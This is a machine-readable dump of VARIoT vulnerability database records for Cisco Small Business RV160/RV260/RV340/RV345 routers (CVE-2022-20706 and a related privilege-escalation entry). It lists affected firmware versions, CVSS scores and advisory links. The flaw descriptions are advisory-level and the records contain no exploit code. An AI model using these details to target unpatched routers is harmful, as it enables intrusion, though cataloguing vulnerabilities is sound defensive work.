               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Cisco Small Business RV  Series router   Buffer Error Vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
      trust: 0.6,
   },
}

var-202202-0321
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0321",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv340w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv340",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv345p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv345",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340",
            scope: null,
            trust: 0.7,
            vendor: "cisco",
            version: null,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "trichimtrich and nyancat0131",
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
      trust: 1.3,
   },
   cve: "CVE-2022-20706",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 9.3,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 8.6,
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 9.3,
                  confidentialityImpact: "Complete",
                  exploitabilityScore: null,
                  id: "CVE-2022-20706",
                  impactScore: null,
                  integrityImpact: "Complete",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "HIGH",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 8.1,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.2,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "High",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 8.1,
                  baseSeverity: "High",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2022-20706",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "ZDI",
                  availabilityImpact: "HIGH",
                  baseScore: 9.8,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  id: "CVE-2022-20706",
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 0.7,
                  userInteraction: "NONE",
                  vectorString: "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2022-20706",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2022-20706",
                  trust: 1,
                  value: "CRITICAL",
               },
               {
                  author: "ZDI",
                  id: "CVE-2022-20706",
                  trust: 0.7,
                  value: "CRITICAL",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202202-167",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULMON",
                  id: "CVE-2022-20706",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root",
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20706",
         },
      ],
      trust: 2.34,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2022-20706",
            trust: 4,
         },
         {
            db: "ZDI",
            id: "ZDI-22-418",
            trust: 2.4,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
            trust: 0.8,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15774",
            trust: 0.7,
         },
         {
            db: "CS-HELP",
            id: "SB2022020301",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2022-20706",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
   },
   id: "VAR-202202-0321",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2023-12-26T22:42:17.117000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-smb-mult-vuln-KA9PK6D",
            trust: 0.8,
            url: "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco has issued an update to correct this vulnerability.",
            trust: 0.7,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco Small Business Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=183259",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-23305 ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-rce ",
         },
         {
            title: "Threatpost",
            trust: 0.1,
            url: "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-787",
            trust: 1,
         },
         {
            problemtype: "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            trust: 1.8,
            url: "https://www.zerodayinitiative.com/advisories/zdi-22-418/",
         },
         {
            trust: 1.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20706",
         },
         {
            trust: 0.6,
            url: "https://www.cybersecurity-help.cz/vdb/sb2022020301",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/787.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
         {
            trust: 0.1,
            url: "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            db: "NVD",
            id: "CVE-2022-20706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            date: "2022-02-10T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20706",
         },
         {
            date: "2023-05-08T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            date: "2022-02-10T18:15:09.360000",
            db: "NVD",
            id: "CVE-2022-20706",
         },
         {
            date: "2022-02-03T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-418",
         },
         {
            date: "2023-11-07T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20706",
         },
         {
            date: "2023-05-08T08:12:00",
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
         {
            date: "2023-11-07T03:42:40.963000",
            db: "NVD",
            id: "CVE-2022-20706",
         },
         {
            date: "2022-02-23T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Cisco Small Business RV  Series router out-of-bounds write vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004816",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-167",
         },
      ],
      trust: 0.6,
   },
}

var-202202-0326
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows local attackers to escalate privileges on affected installations of Cisco RV340 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the utility-ping-request script. The issue results from the creation of a temporary file with insecure permissions. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0326",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv340w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv340",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv345p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv345",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
